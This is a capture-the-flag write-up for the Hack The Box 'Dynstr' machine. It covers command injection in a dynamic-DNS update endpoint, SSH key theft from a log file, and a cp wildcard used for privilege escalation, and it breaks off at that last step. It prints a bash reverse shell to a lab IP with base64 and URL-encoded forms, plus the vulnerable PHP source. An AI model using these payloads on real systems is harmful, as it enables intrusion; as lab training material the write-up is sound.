👀
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Exploit
  • Getting User
  • Privilege Escalation
  1. HACK THE BOX - HTB
  2. Linux Boxes

DYNSTR

PreviousPREVISENextPIT

Last updated 3 years ago

Scanning

NMAP

22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Enumeration

port 80

we have beta mode

Credentials dynadns:sndanyd

email

whatweb

➜  ~ sudo whatweb dynstr.htb
http://dynstr.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[#,dns@dyna.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.244], JQuery, Modernizr, Script[text/javascript], Title[Dyna DNS]

after some directory busting

i found this http://dynstr.htb/nic/update

after some googling i found this page

lets preform this using BurpSuite ... you may get 911 [wrngdom: htb] so try to change hostname

with these values

Exploit

Test hostname Parameter by adding ; or `

we can use `` in hostname param without break logic

reverse shell bash -i >& /dev/tcp/10.10.16.17/4242 0>&1

base64 encode YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK to keep logic up

some bash to decode payload on target

`echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK' | base64 -d | bash`

if we try to send like that logic down

so use url encoding

%60%65%63%68%6f%20%27%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%69%34%78%4e%79%38%30%4d%6a%51%79%49%44%41%2b%4a%6a%45%4b%27%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%60

add Authorization: Basic ZHluYWRuczpzbmRhbnlk header value = base64(dynadns:sndanyd)

setup listener and Send

Finally in 🎉

// Vuln Code
www-data@dynstr:/var/www/html/nic$ cat update
<?php
  // Check authentication
  if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']))      { echo "badauth\n"; exit; }
  if ($_SERVER['PHP_AUTH_USER'].":".$_SERVER['PHP_AUTH_PW']!=='dynadns:sndanyd') { echo "badauth\n"; exit; }
​
  // Set $myip from GET, defaulting to REMOTE_ADDR
  $myip = $_SERVER['REMOTE_ADDR'];
  if ($valid=filter_var($_GET['myip'],FILTER_VALIDATE_IP))                       { $myip = $valid; }
​
  if(isset($_GET['hostname'])) {
    // Check for a valid domain
    list($h,$d) = explode(".",$_GET['hostname'],2);
    $validds = array('dnsalias.htb','dynamicdns.htb','no-ip.htb');
    if(!in_array($d,$validds)) { echo "911 [wrngdom: $d]\n"; exit; }
    // Update DNS entry
    $cmd = sprintf("server 127.0.0.1\nzone %s\nupdate delete %s.%s\nupdate add %s.%s 30 IN A %s\nsend\n",$d,$h,$d,$h,$d,$myip);
    system('echo "'.$cmd.'" | /usr/bin/nsupdate -t 1 -k /etc/bind/ddns.key',$retval);
    // Return good or 911
    if (!$retval) {
      echo "good $myip\n";
    } else {
      echo "911 [nsupdate failed]\n"; exit;
    }
  } else {
    echo "nochg $myip\n";
  }
?>
​

Getting User

there is 2 users bindmgr, dyna

in this directory /home/bindmgr/support-case-C62796521 we fine strace-C62796521.txt

cat strace-C62796521.txt

we find private key

copy it to attacker machine

chmod 600 pri_key

ssh targ not working ....

add ip zone

ssh again it works

Privilege Escalation

cat this script find this

bindmgr@dynstr:~$ cat /usr/local/bin/bindmgr.sh
#!/usr/bin/bash
​
# This script generates named.conf.bindmgr to workaround the problem
# that bind/named can only include single files but no directories.
#
# It creates a named.conf.bindmgr file in /etc/bind that can be included
# from named.conf.local (or others) and will include all files from the
# directory /etc/bin/named.bindmgr.
#
# NOTE: The script is work in progress. For now bind is not including
#       named.conf.bindmgr. 
#
# TODO: Currently the script is only adding files to the directory but
#       not deleting them. As we generate the list of files to be included
#       from the source directory they won't be included anyway.
​
BINDMGR_CONF=/etc/bind/named.conf.bindmgr
BINDMGR_DIR=/etc/bind/named.bindmgr
​
indent() { sed 's/^/    /'; }
​
# Check versioning (.version)
echo "[+] Running $0 to stage new configuration from $PWD."
if [[ ! -f .version ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 42
fi
if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 43
fi
​
# Create config file that includes all files from named.bindmgr.
echo "[+] Creating $BINDMGR_CONF file."
printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF
for file in * ; do
    printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF
done
​
# Stage new version of configuration files.
echo "[+] Staging files to $BINDMGR_DIR."
cp .version * /etc/bind/named.bindmgr/
​
# Check generated configuration with named-checkconf.
echo "[+] Checking staged configuration."
named-checkconf $BINDMGR_CONF >/dev/null
if [[ $? -ne 0 ]] ; then
    echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "
    named-checkconf $BINDMGR_CONF 2>&1 | indent
    exit 44
else 
    echo "[+] Configuration successfully staged."
    # *** TODO *** Uncomment restart once we are live.
    # systemctl restart bind9
    if [[ $? -ne 0 ]] ; then
        echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "
    systemctl status bind9
    else
    echo "[+] Restart of bind9 via systemctl succeeded."
    fi
fi

this part is the key WILDCARD 👏

if this line may looks confuse explain ⬇️

cp [source] [source] [destination]

cp .version * /etc/bind/named.bindmgr/